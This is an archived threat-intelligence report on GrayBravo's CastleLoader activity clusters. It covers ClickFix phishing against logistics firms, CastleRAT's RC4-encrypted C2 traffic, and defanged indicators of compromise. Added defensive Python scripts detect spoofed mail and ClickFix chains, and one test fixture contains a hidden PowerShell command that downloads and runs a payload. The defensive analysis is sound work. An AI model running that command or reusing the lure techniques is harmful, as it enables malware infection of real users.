{
	"id": "3f3bb40d-1e0e-4014-9662-025c7b086ce3",
	"created_at": "2026-04-06T00:21:52.044511Z",
	"updated_at": "2026-04-10T03:38:20.798396Z",
	"deleted_at": null,
	"sha1_hash": "2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd",
	"title": "GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6305189,
	"plain_text": "GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries\r\nBy Insikt Group®\r\nArchived: 2026-04-05 17:18:09 UTC\r\nNote: The analysis cut-off date for this report was November 10, 2025\r\nExecutive Summary\r\nInsikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly\r\nevolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to\r\npublic exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem\r\nuncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics,\r\ntechniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service\r\n(MaaS) model.\r\nFor example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix\r\ntechnique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target\r\nvictims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader\r\nand Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked\r\nthe online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the\r\nalias’s distinctiveness and related discussion topics.\r\nTo protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders,\r\ninfostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services\r\n(LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections.\r\nOther controls include implementing email filtering and data exfiltration monitoring. 
See the Mitigations section for\r\nimplementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).\r\nKey Findings\r\nInsikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique\r\ntactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a\r\nmalware-as-a-service (MaaS) ecosystem, as previously hypothesized.\r\nOne cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the\r\nClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching\r\nplatforms to engage targets.\r\nCluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and\r\nMatanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email\r\nmanagement tooling.\r\nBackground\r\nIn September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at\r\nleast March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be\r\nresponsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most\r\nrecently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public\r\nreporting, and an expansive, evolving infrastructure. 
Alongside the discovery of the previously undocumented remote access\r\ntrojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services,\r\nincluding file-sharing platforms and anti-detection tools.\r\nAlthough public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by\r\nits delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of\r\nMaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums.\r\nRecorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with\r\nonly a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with\r\nit. Many of these connections are routed through Tor nodes, complicating attribution and classification.\r\nThrough continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the\r\nassessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and\r\nprocedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. 
More\r\nspecifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics\r\nsector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 1 of 39\n\nimpersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through\r\nmalvertising and fake software updates.\r\nFigure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)\r\nThreat Analysis\r\nHigher Tier Infrastructure\r\nInsikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of\r\nTier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the\r\nnewly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup\r\npurposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.\r\nFigure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)\r\nCastleRAT\r\nCastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics.\r\nEach variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte\r\nkeys. Because the key is static and embedded in the sample, traffic captured from any infection can be decrypted with the key recovered from that sample, which is also what makes the clustering by key described below possible. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to\r\nobtain victim geographic location and network details. Both variants support remote command execution, file download and\r\nexecution, and establish an interactive remote shell. 
The C variant exhibits additional capabilities, including browser\r\ncredential theft, keylogging, and screen capture functionality.\r\nInfrastructure Analysis\r\nAnalysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across\r\nmultiple nodes sharing the RC4 key “NanuchkaUpyachka”. As illustrated in Figure 3, Insikt Group observed two\r\nCastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintaining concurrent communications with at least\r\nthree US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed\r\nwithin the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly\r\nsimultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy\r\nemployed by the threat actor. Additionally, direct communications between two CastleRAT C-variant C2 servers,\r\n104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than\r\nisolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution,\r\nor key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model\r\nthan previously documented.\r\nFigure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)\r\nNotably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate\r\nhandshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server\r\n(for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00, and the\r\nserver responds with trailing bytes 9e ff 74 70 before closing the connection. 
A similar exchange occurs with\r\n5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and\r\nreceiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00\r\n00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional\r\nhandshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.\r\nClustering by RC4 Key\r\nAnalysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption\r\nkeys (see Figure 4). While each RC4 key forms a distinct cluster, the clusters overlap to some degree because some servers appear under more than one key, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure\r\nsuggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although\r\nthis does not conclusively establish single-threat-actor control, the degree of overlap implies a common developer or operator\r\necosystem rather than independent, uncoordinated usage of the malware.\r\nFigure 4: RC4 key clusters (Source: Recorded Future)\r\nCastleLoader\r\nInfrastructure Analysis\r\nInsikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are\r\nlisted in Appendix A. 
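The CastleRAT traffic details given above (RC4 with a hard-coded sixteen-byte key, a client request that normally ends in 01 00 00 00 or, in the extended handshake, 07 00 00 00, and a server reply ending in 9e ff 74 70) together with the clustering of C2 addresses by key lend themselves to a small triage script. The following is an added example written for this page, not code from the report or from CastleRAT itself: a plain RC4 implementation, a classifier for captured request/reply pairs that looks only at those trailing bytes, and a grouping of C2 addresses by the key recovered from each sample. The framing of the rest of the message, the plaintext marker CR1, the sample payloads and the placeholder second key are assumptions made for the example; the two addresses under “NanuchkaUpyachka” are the ones the report associates with that key, and 195[.]85[.]115[.]44 is assigned the placeholder key only to show a second cluster.

```python
# Added example (not code from the Insikt Group report or from CastleRAT).
# What the page gives us: CastleRAT C2 traffic is RC4-encrypted with a hard-coded
# sixteen-byte key (e.g. 'NanuchkaUpyachka'), a normal client request ends with the
# bytes 01 00 00 00, the extended-handshake variant ends with 07 00 00 00, and the
# server then answers with trailing bytes 9e ff 74 70. Everything else about the
# framing is an assumption made here for illustration; the exchanges below are
# constructed, not captured traffic.
from collections import defaultdict

STANDARD_TRAILER = bytes.fromhex('01000000')
EXTENDED_TRAILER = bytes.fromhex('07000000')
SERVER_ACK_TRAILER = bytes.fromhex('9eff7470')


def rc4(key, data):
    '''Plain RC4 (key scheduling plus keystream generation). RC4 is symmetric,
    so the same call encrypts and decrypts.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def classify_exchange(client_payload, server_payload):
    '''Label one client request / server reply pair using only the trailing bytes
    the report describes: extended handshake, standard request, or unknown.'''
    if client_payload.endswith(EXTENDED_TRAILER) and server_payload.endswith(SERVER_ACK_TRAILER):
        return 'extended-handshake'
    if client_payload.endswith(STANDARD_TRAILER):
        return 'standard'
    return 'unknown'


def cluster_by_key(observations):
    '''Group C2 addresses by the RC4 key carried by the sample that talked to them
    (the idea behind the report's Figure 4). observations: iterable of (key, c2).
    Returns {key: sorted unique C2 addresses}.'''
    groups = defaultdict(set)
    for key, c2 in observations:
        groups[key].add(c2)
    return {key: sorted(c2s) for key, c2s in groups.items()}


# Constructed sample data. KEY is the key named in the report; OTHER_KEY is a
# placeholder used only to show a second cluster. MARKER is a hypothetical
# plaintext field, not a real CastleRAT structure.
KEY = b'NanuchkaUpyachka'
OTHER_KEY = b'placeholderkey00'
assert len(KEY) == 16 and len(OTHER_KEY) == 16
MARKER = b'CR1'
standard_request = rc4(KEY, MARKER + b'hello') + STANDARD_TRAILER
extended_request = rc4(KEY, MARKER + b'hello') + EXTENDED_TRAILER
server_reply = rc4(KEY, b'ok') + SERVER_ACK_TRAILER

OBSERVED = [
    (KEY, '104[.]225[.]129[.]171'),
    (KEY, '144[.]208[.]126[.]50'),
    (OTHER_KEY, '195[.]85[.]115[.]44'),
]

if __name__ == '__main__':
    print(classify_exchange(standard_request, server_reply))
    print(classify_exchange(extended_request, server_reply))
    # strip the 4-byte trailer, then decrypt the body with the recovered key
    print(rc4(KEY, standard_request[:-4]))
    print(cluster_by_key(OBSERVED))
```

The trailer check is deliberately conservative: a pair is labelled extended-handshake only when both sides show the bytes the report describes, so a truncated capture falls through to unknown rather than being misfiled.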
Notably, several domains share the same start of authority (SOA) contact email address in their DNS zones (the SOA RNAME field, which is separate from WHOIS registrant data), indicating\r\nthey were likely registered and configured by the same threat actor.\r\nIn addition, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely\r\nused for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView.\r\nAt least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.\r\nActivity Clusters\r\nInsikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 1). The\r\nfirst cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically\r\ntailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages\r\nBooking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The\r\nfourth cluster relies on malvertising campaigns and fake software update mechanisms.\r\nBased on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap\r\nin infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users\r\nand GrayBravo (formerly tracked as TAG-150) remains unclear. 
Insikt Group further assesses that additional CastleLoader\r\nusers are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels,\r\nwhich collectively suggest a broader user base.\r\nCluster 1: Logistics Sector-Focused Activity Tracked as TAG-160\r\nCluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis.\r\nTAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures,\r\namong other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the\r\ncluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed\r\nexploiting weaknesses in target organizations’ email defenses, such as spoofing legitimate sender addresses of logistics\r\ncompanies to enhance the credibility of its phishing campaigns; such spoofing succeeds where the impersonated domain publishes no enforcing DMARC policy or the receiving gateway does not evaluate SPF, DKIM, and DMARC alignment. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight \u0026 Analytics and Loadlink Technologies for multiple purposes.\r\nAttack Flow\r\nCluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5\r\nillustrates a high-level overview of the phishing attack flow.\r\nFigure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)\r\nThe attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example,\r\nenglandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to\r\nUS-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. 
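The two sender patterns just described, a spoofed legitimate address and a typosquatted domain, are exactly what DMARC alignment and a lookalike-domain check at the receiving gateway are meant to catch. The following is an added example written for this page, not code from the report: it parses the Authentication-Results header a receiving mail server stamps on a message, decides whether the From: domain is aligned with an SPF or DKIM pass, and compares the From: domain against a brand list. The three messages, the recipient domain carrier.example, the authentication results and the brand list (only the domain the report names) are constructed for the example.

```python
# Added example, not code from the report. Two gateway-side checks for the sender
# patterns the report describes for TAG-160: a spoofed legitimate address
# (no-reply@englandlogistics.com) is caught by DMARC-style alignment of the From:
# domain with an SPF or DKIM pass; a typosquatted domain (englandloglstics.com) is
# caught by a lookalike check against a brand list. The messages, the recipient
# domain carrier.example and the Authentication-Results values are constructed.
import email
import re
from email.utils import parseaddr

BRAND_DOMAINS = ['englandlogistics.com']   # assumption: only the brand the report names


def domain_part(value):
    '''user@host or bare host to a lower-case host.'''
    return value.strip().rpartition('@')[2].lower().strip('.')


def org_domain(host):
    '''Relaxed DMARC organizational domain: the last two labels. A production check
    uses the Public Suffix List; two labels are enough for the .com examples here.'''
    return '.'.join(host.split('.')[-2:])


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost))
        prev = cur
    return prev[-1]


def fold(domain):
    '''Collapse the substitutions typosquats rely on: l and 1 for i, 0 for o, rn for m, vv for w.'''
    return domain.replace('rn', 'm').replace('vv', 'w').translate(str.maketrans('l10', 'iio'))


def lookalike_of(domain, brands):
    '''Brand a domain imitates: one edit away, or identical after folding. The brand
    itself is not a lookalike; that case is decided by alignment instead.'''
    for brand in brands:
        if domain == brand:
            return None
        if levenshtein(domain, brand) == 1 or fold(domain) == fold(brand):
            return brand
    return None


def assess(raw_message, brands=BRAND_DOMAINS):
    '''Return the From: org domain, whether it is aligned with an SPF/DKIM pass, the
    brand it imitates (if any), and whether the message should be quarantined.'''
    msg = email.message_from_string(raw_message)
    from_domain = org_domain(domain_part(parseaddr(msg.get('From', ''))[1]))
    results = ' '.join(msg.get_all('Authentication-Results', []))
    spf = re.search('spf=(pass|fail|softfail|none|neutral|temperror|permerror)', results)
    spf_from = re.search('smtp[.]mailfrom=([^; ]+)', results)
    dkim = re.search('dkim=(pass|fail|none)', results)
    dkim_d = re.search('header[.]d=([^; ]+)', results)
    aligned = False
    if spf and spf.group(1) == 'pass' and spf_from and org_domain(domain_part(spf_from.group(1))) == from_domain:
        aligned = True
    if dkim and dkim.group(1) == 'pass' and dkim_d and org_domain(domain_part(dkim_d.group(1))) == from_domain:
        aligned = True
    brand = lookalike_of(from_domain, brands)
    suspicious = (from_domain in brands and not aligned) or brand is not None
    return {'from_domain': from_domain, 'aligned': aligned, 'lookalike_of': brand, 'suspicious': suspicious}


# Constructed sample 1: spoofed legitimate sender; the receiving MTA saw SPF fail and no DKIM.
SPOOFED = '''From: no-reply@englandlogistics.com
To: dispatch@carrier.example
Subject: Rate confirmation 44821 - link expires today
Authentication-Results: mx.carrier.example; spf=fail smtp.mailfrom=englandlogistics.com; dkim=none; dmarc=fail header.from=englandlogistics.com

Please view your rate confirmation at the link below.
'''
# Constructed sample 2: typosquatted sender domain with valid SPF and DKIM for the attacker-owned domain.
TYPOSQUAT = '''From: rates@englandloglstics.com
To: dispatch@carrier.example
Subject: Rate confirmation 44821
Authentication-Results: mx.carrier.example; spf=pass smtp.mailfrom=englandloglstics.com; dkim=pass header.d=englandloglstics.com

Please view your rate confirmation at the link below.
'''
# Constructed sample 3: what a genuine message from the brand would look like.
LEGIT = '''From: no-reply@englandlogistics.com
To: dispatch@carrier.example
Subject: Rate confirmation 44821
Authentication-Results: mx.carrier.example; spf=pass smtp.mailfrom=englandlogistics.com; dkim=pass header.d=englandlogistics.com

Your rate confirmation is attached.
'''

if __name__ == '__main__':
    for sample in (SPOOFED, TYPOSQUAT, LEGIT):
        print(assess(sample))
```

Note that the typosquat passes authentication cleanly, because the attacker controls that domain and its DNS; only the lookalike comparison flags it, which is why both checks are needed.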
However, other\r\norganizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.\r\nThe emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy\r\nand paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the\r\nlink will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt\r\nGroup has observed multiple variations of these landing pages.\r\nFigure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)\r\nNotably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain,\r\nloadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as\r\nobserved in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to\r\nbe directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a\r\ncontainer freight station.\r\nFigure 7: “dpeforms” page found in Google Search (Source: Recorded Future)\r\nAfter submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of\r\nsteps purportedly required to complete a document signing process (see Figure 8). 
By incorporating the DocuSign logo, the\r\nthreat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.\r\nFigure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)\r\nBy following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9.\r\nThis command runs silently in the background, downloads and extracts a payload archive from a remote IP address,\r\nexecutes Python-based malware using pythonw.exe (the console-less Windows Python interpreter, so no window appears), and displays a decoy message to appear legitimate. Observed\r\npayloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.\r\nFigure 9: ClickFix command (Source: Recorded Future)\r\nUse of Compromised Infrastructure\r\nAs part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as\r\npreviously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely\r\nleveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing\r\nmessages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap\r\naccount.\r\nInfrastructure Analysis\r\nInsikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either\r\nimpersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of\r\nthese domains include the subdomain apps[.]englandlogistics (for example,\r\napps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics,\r\nas outlined in the previous section. 
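Returning to the ClickFix step described under Attack Flow above: the chain the report describes (a pasted command, an archive fetched from a raw IP address, and a script started with pythonw.exe) leaves a recognisable process-creation pattern. The following is an added example written for this page, not a rule from the report: it scores interpreter launches from explorer.exe whose command line fetches from a raw IP and unpacks an archive, then pairs each with a pythonw.exe start from a user-writable path on the same host and user within two minutes. The events, command lines, hostnames and the address 203.0.113.10 are constructed; the actual command in Figure 9 is not reproduced here, and the assumption that the parent is explorer.exe comes from the usual ClickFix instruction to paste into the Win+R Run box, which the report does not state for this campaign.

```python
# Added example; detection logic written for this page, not a rule from the report.
# Behaviour being looked for (as the report describes TAG-160's ClickFix step): a
# user-launched interpreter, typically from the Win+R Run box so the parent is
# explorer.exe, that fetches an archive from a raw IP address, unpacks it, and starts
# pythonw.exe on a script under the user profile. Events and command lines below are
# constructed; the exact command in the report's Figure 9 is not reproduced.
import re

SHELLS = {'powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe'}
RAW_IP_URL = re.compile('https?://[0-9]{1,3}([.][0-9]{1,3}){3}')
FETCH_WORDS = ('invoke-webrequest', 'iwr ', 'curl ', 'wget ', 'downloadfile', 'bitsadmin')
UNPACK_WORDS = ('expand-archive', 'tar ', '.zip')
USER_WRITABLE = ('/appdata/', '/temp/', '/downloads/', '/public/', '/programdata/')
WINDOW_SECONDS = 120
BACKSLASH = chr(92)


def norm(path):
    '''Lower-case and turn Windows separators into forward slashes so the checks
    work on real paths as well as on the forward-slash samples used here.'''
    return path.lower().replace(BACKSLASH, '/')


def basename(path):
    return norm(path).rsplit('/', 1)[-1]


def score_launcher(event):
    '''0 to 4 points: shell spawned by explorer.exe, raw-IP URL, a download verb,
    and an unpack verb. Partial matches stay visible instead of being dropped.'''
    cmd = event['cmdline'].lower()
    pts = 0
    if basename(event['parent']) == 'explorer.exe' and basename(event['image']) in SHELLS:
        pts += 1
    if RAW_IP_URL.search(cmd):
        pts += 1
    if any(w in cmd for w in FETCH_WORDS):
        pts += 1
    if any(w in cmd for w in UNPACK_WORDS):
        pts += 1
    return pts


def find_clickfix_chains(events, min_score=3):
    '''Pair each launcher scoring at least min_score with a later pythonw.exe start on
    the same host and user, running a script from a user-writable path, inside
    WINDOW_SECONDS. Timestamps are integer epoch seconds.'''
    findings = []
    launchers = [e for e in events if score_launcher(e) in range(min_score, 5)]
    for launcher in launchers:
        for e in events:
            same_context = e['host'] == launcher['host'] and e['user'] == launcher['user']
            delta = e['ts'] - launcher['ts']
            if not same_context or delta not in range(0, WINDOW_SECONDS + 1):
                continue
            if basename(e['image']) != 'pythonw.exe':
                continue
            if any(p in norm(e['cmdline']) for p in USER_WRITABLE):
                findings.append({
                    'host': launcher['host'],
                    'user': launcher['user'],
                    'launcher_pid': launcher['pid'],
                    'python_pid': e['pid'],
                    'seconds_apart': delta,
                })
    return findings


# Constructed process-creation events (paths written with forward slashes here).
EVENTS = [
    {'ts': 1000, 'host': 'wks-17', 'user': 'corp/dispatch', 'pid': 4120,
     'parent': 'C:/Windows/explorer.exe',
     'image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'cmdline': 'powershell -w hidden -c iwr http://203.0.113.10/p.zip -OutFile $env:TEMP/p.zip; '
                'Expand-Archive $env:TEMP/p.zip $env:TEMP/p; Start-Process pythonw.exe $env:TEMP/p/run.py'},
    {'ts': 1004, 'host': 'wks-17', 'user': 'corp/dispatch', 'pid': 4188,
     'parent': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'image': 'C:/Users/dispatch/AppData/Local/Temp/p/pythonw.exe',
     'cmdline': 'pythonw.exe C:/Users/dispatch/AppData/Local/Temp/p/run.py'},
    {'ts': 1300, 'host': 'wks-02', 'user': 'corp/dev', 'pid': 2210,
     'parent': 'C:/Windows/explorer.exe',
     'image': 'C:/Program Files/Python312/pythonw.exe',
     'cmdline': 'pythonw.exe C:/Program Files/Python312/Lib/idlelib/idle.pyw'},
]

if __name__ == '__main__':
    for finding in find_clickfix_chains(EVENTS):
        print(finding)
```

The third event is the benign case the pairing is meant to ignore: a developer starting IDLE from the Start menu also gives pythonw.exe with an explorer.exe parent, but there is no preceding download-and-unpack launcher on that host, so nothing is raised.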
One domain, loadstrucking[.]com, instead featured the subdomain app[.]england,\r\nfollowing a similar naming pattern.\r\nInsikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between\r\nJuly 6 and September 26, 2025, which was serving the file newtag.zip (SHA256:\r\nd87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP archive contained a legitimate WinGup\r\nexecutable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently\r\nretrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.\r\nDomain Re-Registration Tactic\r\nSimilarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor\r\ndeliberately re-registered domains previously associated with legitimate logistics companies, in addition to using\r\ntyposquatted domains. Figure 10 provides two examples of this activity.\r\nFigure 10: Re-registration of logistics-themed domains (Source: Recorded Future)\r\nNotably, the domain cdlfreightlogistics[.]com appears to have previously hosted a website associated with the legitimate\r\ncompany CDL Freight Logistics, Inc. in 2023. Similarly, the domain hometownlogisticsllc[.]com hosted a website for\r\nHometown Logistics LLC in 2021 (see Figure 11).\r\nFigure 11: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)\r\nPublic Complaints and Suspected Access to DAT and Loadlink\r\nSome of the domains listed in the Infrastructure Analysis section have been publicly referenced in connection with\r\nsuspicious or fraudulent activity. 
For example, the email address david[@]cdlfreightlogistics[.]com, associated with the\r\ndomain cdlfreightlogistics[.]com, first appeared on August 26, 2025, in a public Telegram channel named\r\n“current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as\r\nmarket rates. In that instance, a user asked other members whether an email was legitimate (see Figure 12). Several\r\nrespondents indicated they did not believe it to be legitimate.\r\nFigure 12: Example phishing email sent by TAG-160 (Source: Recorded Future)\r\nWhile Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the\r\nchannel, the available text suggests that the threat actor initially contacted potential victims without including malicious\r\ncontent, likely aiming to establish rapport before sending follow-up messages containing malicious links.\r\nIn another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode\r\nIsland, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight \u0026\r\nAnalytics (dat.com) and Loadlink Technologies (loadlink.ca), both platforms operating in the freight matching industry (see\r\nFigure 13). The fraudulent registrations used fake company information, including the email address paul[@]mrlogsol[.]ca,\r\nwhich is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email\r\naddresses used in these operations often consist of only a first name (for example, Paul). 
The employee reported having\r\ncontacted both DAT and Loadlink to alert them to the fraudulent activity.\r\nFigure 13: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)\r\nBased on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as\r\nwell, it appears that the threat actor was also using a Gmail address impersonating their company,\r\nmaritza[.]rmlogisticsol[@]gmail[.]com (see Figure 14).\r\nFigure 14: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)\r\nThreat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a\r\nuser report of fraudulent activity on Facebook (see Figure 13) and further supported by additional profiles identified by\r\nInsikt Group (see Figure 15). 
Furthermore, Insikt Group assesses that the threat actors may also have access to\r\ncompromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains dat[.]com\r\nand loadlink[.]ca observed in Recorded Future Identity Intelligence.\r\nFigure 15: Account information linked to TAG-160 (Source: Recorded Future)\r\nAccess to platforms like DAT Freight \u0026 Analytics and Loadlink Technologies not only enables the threat actors to enhance\r\nthe appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but\r\nalso provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such\r\nas details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing\r\nlures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings\r\ncontaining malicious content, potentially resulting in malware infections.\r\nPossible Overlap with September 2024 Campaign\r\nIn September 2024, Proofpoint reported on an unattributed activity cluster observed since at least May 2024. The threat\r\nactors targeted transportation and logistics companies in North America to distribute various malware families, including\r\nLummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp,\r\nPDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised\r\nlegitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing\r\nemail threads to enhance credibility. They also used compromised accounts on DAT Freight \u0026 Analytics and Loadlink\r\nplatforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. 
